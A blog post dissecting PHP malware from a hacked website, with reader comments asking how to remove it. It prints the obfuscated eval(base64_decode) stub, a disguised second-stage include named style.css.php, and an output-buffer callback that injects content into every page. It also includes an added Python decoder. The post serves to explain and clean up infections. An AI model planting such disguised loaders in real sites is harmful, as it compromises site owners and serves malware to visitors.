Hacking the Code

In my last post I talked about how to clean up a hacked web server; hopefully your server is clean now and you can get back to what you do best. But what was the hacker trying to do? What does that long string mean? I will show you how to decode the string the safe way, and how it was constructed.

The example I am going to use is from a real hacked website. The code I will display is only partial, but the construct will be complete. Any identifiable URLs have been changed to prevent identification and for your safety.
Let's start by identifying the code. This is what I found at the very beginning of the page:
<? /**/eval(base64_decode(aWYoZnVuY3Rpb25<–>KTt9fX0=)); ?>

Let's start with /**/. It looks innocent, but it is a way to hide the code. /* ... */ is normally used for large blocks of comments: instead of putting // on each line you start the block with /* and end it with */. What I noticed is that in Bluefish and Notepad++ the whole line appears to be a comment when it is highlighted, so my guess is that other code scanners will also see one long comment on that line and skip it. This is only my own conclusion from testing, but it is a very clever way to use comments.

I almost forgot: the first thing to notice is the use of short tags (<?). On my personal server I have short tags disabled; I had learned that they should be disabled for security purposes, though I don't know if that still holds true today. The reason they use the short tag is that it helps the line pass as a comment; adding php to it (<?php) makes it show up as PHP code, not a comment. Now it is starting to unravel...

eval – evaluates a string as PHP code.

Very simple, right? They need something to run their code, and eval does the trick; you can even include HTML in the string. Just another piece of the pie.

base64_decode – decodes base64-encoded data. Now, what is base64? It was originally designed for email, to send binary data in messages, and it has other uses such as carrying binary data in URLs and other variables, but its newest use is hiding PHP code in a long string. This string was 2692 characters long. So what was in that string?

I took a lot of code out of these strings; the variable names were 32 characters long each, which would have made the code even more cryptic than this slightly smaller version. But first let's go over the code line by line and find out what it is doing.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1; // run only once per request
if(file_exists('/home/content/<—–>/admin/includes/languages/english/images/buttons/style.css.php')){
include_once('/home/content/<——>/admin/includes/languages/english/images/buttons/style.css.php'); // second-stage file disguised as CSS
if(function_exists('gml')&&!function_exists('dgobh')){
if(!function_exists('gzdecode')){ // polyfill for PHP builds that lack gzdecode()
function gzdecode($R20FD)
{$R6B6E=ord(substr($R20FD,3,1)); // gzip header FLG byte (RFC 1952)
$R6016=10; // the fixed gzip header is 10 bytes
$R0D54=0;
if($R6B6E&4) // FEXTRA: 2-byte little-endian length, then that many bytes
{$R0D54=unpack('v',substr($R20FD,10,2));
$R0D54=$R0D54[1];
$R6016+=2+$R0D54;}
if($R6B6E&8){$R6016=strpos($R20FD,chr(0),$R6016)+1;} // FNAME: skip zero-terminated file name
if($R6B6E&16){$R6016=strpos($R20FD,chr(0),$R6016)+1;} // FCOMMENT: skip zero-terminated comment
if($R6B6E&2){$R6016+=2;} // FHCRC: skip 16-bit header CRC
$RC4A5B=gzinflate(substr($R20FD,$R6016)); // raw-inflate the compressed body
if($RC4A5B===FALSE){$RC4A5B=$R20FD;} // not gzip: hand back the input unchanged
return $RC4A5B;
}}
function dgobh($RDA3E){Header('Content-Encoding: none'); // output-buffer callback
$R3E33=gzdecode($RDA3E);
if(preg_match('/]*>)/si','$1'.gml(),$R3E33);} // pattern shown as on the page; part of it was lost when the page was rendered
else{
return gml().$R3E33; // otherwise prepend gml()'s output to the page
}}
ob_start('dgobh'); // every page's output now passes through dgobh() before being sent
}}}

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1; is the first line. It starts by checking for ob_start; this function stores output (variables, strings, whole pages) in a buffer before it is sent to the browser, and the code needs it to exist. Next it checks whether a global variable called 'sh_no' is set; I am not sure what this check is for, but it sets the variable to 1 if it doesn't exist. As a side note, I will not go into the logic until all the functions are understood.

After that it looks for style.css.php and, if it exists, includes it; we will look into that file a little later. Next is the gzdecode function: if it exists, wonderful, and if it doesn't, the code defines its own. So what is gzdecode? The obvious answer is that it decodes gzip-encoded strings and files, and that is what they have done: encoded more strings, but now with a different encoding. Damn, they're getting tricky.

Now the last great tidbit before going into the other files:

function dgobh($RDA3E){Header('Content-Encoding: none');
$R3E33=gzdecode($RDA3E);
if(preg_match('/]*>)/si','$1'.gml(),$R3E33);}
else{
return gml().$R3E33;
}}
ob_start('dgobh');
}}}

Now, the function dgobh first sets the Content-Encoding header to none, which I am not too familiar with; I will look into it and update later. Then it decodes its input, most likely a string. Next it runs preg_match, which searches a string for a match against a regular expression, and regular expressions are one of my weak points. We also need to find out what gml() does and what it returns. After that it registers dgobh as the output buffer callback, so it is used on everything the page sends later on. There is more to this code than what I currently have; I will update as soon as I get the other file.
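To decode a stub like this the safe way, without ever running it, here is an added example (my own Python, not code from the post or from the malware): it pulls the base64 argument out of eval(base64_decode(...)), then walks the gzip header exactly as the obfuscated gzdecode() above does (the same flag bits 4, 8, 16 and 2) and inflates the body. The sample stub it decodes is constructed here; the file name and comment inside its gzip header are made up.

```python
import base64
import re
import struct
import zlib

# gzip FLG bits (RFC 1952) tested by the obfuscated gzdecode() polyfill above
FHCRC, FEXTRA, FNAME, FCOMMENT = 2, 4, 8, 16

def gzdecode_manual(data: bytes) -> bytes:
    """Skip the gzip header the way the malware's gzdecode() does, then
    raw-inflate the body (PHP gzinflate == zlib with wbits=-15)."""
    if data[:2] != b"\x1f\x8b":
        return data                        # not gzip: hand back the input unchanged
    flags, pos = data[3], 10               # FLG byte at offset 3, fixed 10-byte header
    if flags & FEXTRA:                     # 2-byte little-endian XLEN, then XLEN bytes
        pos += 2 + struct.unpack("<H", data[pos:pos + 2])[0]
    if flags & FNAME:                      # zero-terminated original file name
        pos = data.index(b"\x00", pos) + 1
    if flags & FCOMMENT:                   # zero-terminated comment
        pos = data.index(b"\x00", pos) + 1
    if flags & FHCRC:                      # 16-bit header CRC
        pos += 2
    return zlib.decompressobj(-15).decompress(data[pos:])

def extract_eval_payload(php_source: str) -> bytes:
    """Pull the base64 argument out of eval(base64_decode(...)) without executing it."""
    m = re.search(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)", php_source)
    if not m:
        raise ValueError("no eval(base64_decode(...)) stub found")
    return base64.b64decode(m.group(1))

def decode_layers(php_source: str) -> str:
    """Layer 1: base64. Layer 2: gzip, if the result is a gzip member. Returns the hidden PHP."""
    return gzdecode_manual(extract_eval_payload(php_source)).decode("latin-1")

def build_sample(hidden_php: str) -> str:
    """Constructed sample stub: a gzip member with FEXTRA|FNAME|FCOMMENT|FHCRC all set,
    so every header branch in gzdecode_manual() is exercised. Name and comment are made up."""
    body = hidden_php.encode("latin-1")
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = co.compress(body) + co.flush()
    hdr = b"\x1f\x8b\x08" + bytes([FEXTRA | FNAME | FCOMMENT | FHCRC]) + b"\x00" * 6
    hdr += struct.pack("<H", 4) + b"ABCD"               # extra field
    hdr += b"style.css.php\x00" + b"made up comment\x00"
    hdr += struct.pack("<H", zlib.crc32(hdr) & 0xFFFF)   # header CRC16
    member = hdr + deflated + struct.pack("<II", zlib.crc32(body), len(body))
    return '<? /**/eval(base64_decode("%s")); ?>' % base64.b64encode(member).decode()

SAMPLE_STUB = build_sample("<?php echo 'hidden'; ?>")
```

Call decode_layers(SAMPLE_STUB) and print the result; the recovered source is only ever displayed, never passed to eval or a PHP interpreter.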


4 Responses to Hacking the Code

  1. My site is affected with this code. What can I do to get rid of it?

    • There are 2 ways to get rid of the code. The first way is to manually go through all your files and delete the code from those files, and remove all uploaded files that the code references (i.e. config.php.css, or other similar css files). If you're computer savvy and have a Linux server, you could run the grep command to find all the files affected. The other way is to find a backup of your site from before the attack happened, or reload it from scratch.

      But this will all be for nothing if you don't know where the attack entered from; if this hole is left open it will happen again.

      Good luck!!

      Justin

      • I wonder if you can help at all.
        This morning (4th Oct) at 06:57, my site on a Linux server was hacked with a virus, leaving the following code above all PHP files in my site:

        I have been through many of the PHP files trying to delete it; however, it seems that it is on every single one and this is going to take me ages. I heard that you can run the grep command to find all the affected files on a Linux server; however, I am entirely unsure how to go about this and would like further advice please, as this is affecting me and my customers.

        Kind Regards,

        Richard

        • Richard –
          I'm sorry that you were hacked, and best of luck. But what you are going to need to do is run "grep" to find all the files with the line and then use "sed" to delete the line from those files. Or the other thing to do is run "sed" on all the files.
          To run these commands you will have to have SSH access to your server. You can find out more on how to activate it through your hosting company.

          I will try and put up the usage of the commands to help get rid of the code, hopefully later on tonight.

          As for your customers, I would put up a temp site letting them know that you are doing maintenance, and clean up the code. You should do this as soon as possible, since your site is serving a malware page.
          Then make sure the hacker's access has been cut off, by turning off FTP and changing passwords. If you need more assistance feel free to email me.
          justinsolarski@gmail.com